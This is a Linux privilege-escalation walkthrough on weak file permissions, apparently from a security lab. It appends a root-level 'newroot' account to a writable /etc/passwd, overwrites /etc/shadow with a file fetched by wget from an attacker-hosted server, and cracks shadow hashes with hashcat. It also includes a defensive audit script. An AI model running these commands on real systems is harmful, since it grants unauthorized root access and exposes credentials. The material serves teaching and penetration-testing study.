Weak File Permissions
In Linux, file permissions are used to control who can access files and directories and what level of privileges users have on them. The most common file permission settings include read, write, and execute, which are assigned to three groups: owner, group, and others.
When file permissions are set incorrectly, it can allow unauthorized users or processes to access, modify, or execute files and directories.
Linux file and directory permissions are fairly simple. When you run ls -la on a directory, you'll see output like the following:
Permission | Meaning
---|---
r | Read permission
w | Write permission
x | Execute permission

Position in rwxrwxrwx | Meaning
---|---
First triplet | Owner of the file (creator)
Second triplet | Group ownership of the file
Third triplet | Other users' permissions
With the example above, file 1 is readable, writable and executable by everyone. File 2 is readable, writable and executable by its owner, "activepwn", but only readable by other users.
Full Walkthroughs
Writable /etc/passwd file
As a low-privilege user, you can most likely read this file, but if you have permission to write to it, you can add a new user and give them root privileges.
For the scenarios below, we'll have a low-privileged shell as the "victim" user on an Ubuntu machine. Let's check whether the file is writable:
ls -la /etc/passwd
The output above shows us that "other users" have read, write and execute permissions on the file.
Since it's writable, we can add our own user to the passwd file and give them root privileges.
Before we add the user, we need a password hash for them. We can use openssl to generate one.
openssl passwd "password"
After the hash is generated, we can echo a new user entry into /etc/passwd. The line we need to append is:
newroot:$1$kvEj8l/0$wI7EJbiz6SxJRw35HnDoY/:0:0:root:/root:/bin/bash
- newroot is the username we're choosing
- $1$kvEj8l/0$wI7EJbiz6SxJRw35HnDoY/ is the password hash we generated
- 0:0 is the user identifier and group identifier, respectively. We set both to 0 because those are root's UID and GID
- root is who the "newroot" user will be logged in as
- /root is the home directory
- /bin/bash is the login shell that the “newroot” user will have
echo 'newroot:$1$kvEj8l/0$wI7EJbiz6SxJRw35HnDoY/:0:0:root:/root:/bin/bash' >> /etc/passwd
Checking /etc/passwd, we can see that the "newroot" user has been added:
tail -n 3 /etc/passwd
Let's try switching to the "newroot" user.
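As an added defensive check (not code from the original walkthrough), the script below parses passwd-format content and flags exactly the kind of entry appended above, an extra UID 0 account carrying its hash inline, and reports when /etc/passwd, /etc/shadow or /var/backups/shadow.bak grant more permission bits than expected. The sample passwd content and the expected modes (0644 and 0640) are constructed assumptions.

```python
import os
import stat
from pathlib import Path

# Constructed sample passwd content (not from a real host). The last line is the
# kind of entry the walkthrough appends: a second UID 0 account with its hash inline.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
victim:x:1000:1000:victim:/home/victim:/bin/bash
newroot:$1$kvEj8l/0$wI7EJbiz6SxJRw35HnDoY/:0:0:root:/root:/bin/bash
"""
# The seven colon-separated fields; field 5 is the GECOS comment, not an identity.
FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

def parse_passwd(text):
    """Split passwd-format text into one dict per non-empty, non-comment line."""
    rows = [ln.split(":") for ln in text.splitlines() if ln.strip() and not ln.startswith("#")]
    return [dict(zip(FIELDS, r)) for r in rows if len(r) == 7]

def suspicious_accounts(text):
    """Flag UID 0 entries other than root, and entries whose second field holds a
    hash instead of the 'x' placeholder that defers the hash to /etc/shadow."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(("extra-uid0", e["name"]))
        if e["passwd"] not in ("x", "*", "!", ""):
            findings.append(("inline-hash", e["name"]))
    return findings

def permission_finding(st_mode, path, expected):
    """Message if st_mode grants bits beyond expected (0644 passwd, 0640 shadow), else None."""
    perm = stat.S_IMODE(st_mode)
    extra = perm & ~expected
    return f"{path}: mode {perm:04o} grants extra bits {extra:04o}" if extra else None

def audit_live_system():
    """Run both checks on the host; checking /etc/shadow needs only stat(), not read access."""
    results = []
    for path, expected in (("/etc/passwd", 0o644), ("/etc/shadow", 0o640),
                           ("/var/backups/shadow.bak", 0o640)):
        if os.path.exists(path):
            msg = permission_finding(os.stat(path).st_mode, path, expected)
            if msg:
                results.append(msg)
    passwd = Path("/etc/passwd").read_text()
    return results + [f"{kind}: {name}" for kind, name in suspicious_accounts(passwd)]

if __name__ == "__main__":
    print("\n".join(audit_live_system()) or "no findings")
```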
/etc/shadow
If the /etc/shadow file is writable, we can change the root user's password.
We can generate the new password hash using mkpasswd:
mkpasswd -m sha-512 newpassword
Don’t modify the actual /etc/shadow file (this can be risky and difficult to do with unstable shells).
Instead, let's copy and paste the contents of the shadow file into a text editor on Kali and modify it there with our generated hash.
cat /etc/shadow
Pasted and modified in Kali:
Now we can bring the altered shadow file over. Host a Python web server on Kali:
python3 -m http.server 80
Then use wget on the target to fetch the altered shadow file (the original command passed "shadow" as a second URL; -O names the output file):
wget -O shadow http://192.168.5.7/shadow
Create a backup of the original /etc/shadow file:
cp /etc/shadow shadow.tmp
Now we can replace the contents of the original shadow file with our own shadow file's content:
cat shadow > /etc/shadow
Note: The reason I didn't just move the original file is that certain versions of Linux prevent you from completely deleting, moving or replacing the shadow file, and this is a "creative" way of getting past that.
Checking the shadow file, we can see that the contents have changed.
Now log in with the credentials.
After you've finished with the exploit, make sure to restore the altered shadow file from the backup you created.
Cracking a shadow file (read permissions)
Even if we don't have write privileges on /etc/shadow, being able to read it lets us copy the hashes and try to crack them offline.
Let's copy the password hash and paste it into a file on Kali.
We can try to crack this with hashcat, but first we need to identify the hash type. Let's check this page:
Since the $6$ prefix of the hash matches the example hash given on the page, we can conclude that this is a SHA-512 hash.
From this, we know that we need to use hashcat mode 1800 for this hash:
hashcat -m 1800 <hash_file> <wordlist>
After a little while, we can see that the password has been cracked.
Note: Since it's SHA-512, cracking can take a very long time.
Insecure Backup
Check the /root, /tmp and /var/backups directories.
You can check /var/backups for the shadow.bak file. If you have read permission on that file, you might find credentials in it.
If you have read permission on /root, you can check for SSH keys. If there is an SSH key, you can try to log in with it using:
ssh -i key_file root@192.168.0.1